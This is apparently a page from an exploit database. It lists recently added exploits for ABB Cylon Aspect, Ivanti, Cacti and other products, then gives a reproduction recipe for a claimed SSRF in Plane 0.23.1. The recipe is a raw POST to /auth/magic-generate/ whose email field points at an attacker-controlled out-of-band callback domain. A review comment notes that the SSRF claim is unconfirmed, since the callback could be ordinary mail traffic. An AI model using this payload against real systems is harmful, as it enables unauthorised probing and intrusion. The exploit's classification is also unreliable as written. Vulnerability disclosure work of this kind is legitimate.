
22 changes to exploits/shellcodes/ghdb

Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure
ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection
Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
ABB Cylon Aspect 3.08.03 - Hard-coded Secrets
Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
IBMi Navigator 7.5 - HTTP Security Token Bypass
IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)
Plane 0.23.1 - Server side request forgery (SSRF)
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning
Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)
OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
Really Simple Security 9.1.1.1 - Authentication Bypass
Pymatgen 2024.1 - Remote Code Execution (RCE)
30 lines
No EOL
1.1 KiB
Text
# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64
Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.
Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control:
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
Send the request:
POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system. |
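Review bot: the Description states that the server sends HTTP requests to attacker-controlled domains, but the steps only place that domain after the "@" in the "email" value posted to /auth/magic-generate/, and step 3 does not record what interaction was actually observed. Please add the observed callback (protocol, request line, source address) so readers and defenders can tell a server-side HTTP fetch apart from the DNS and SMTP traffic that any outbound mail to that address would generate; as written, the SSRF classification cannot be confirmed from the file. Two smaller points: "Send the request:" sits unnumbered between steps 2 and 3, and the header block names the affected version (v0.23.1) but gives no fixed version or advisory reference, which makes it hard to scope remediation.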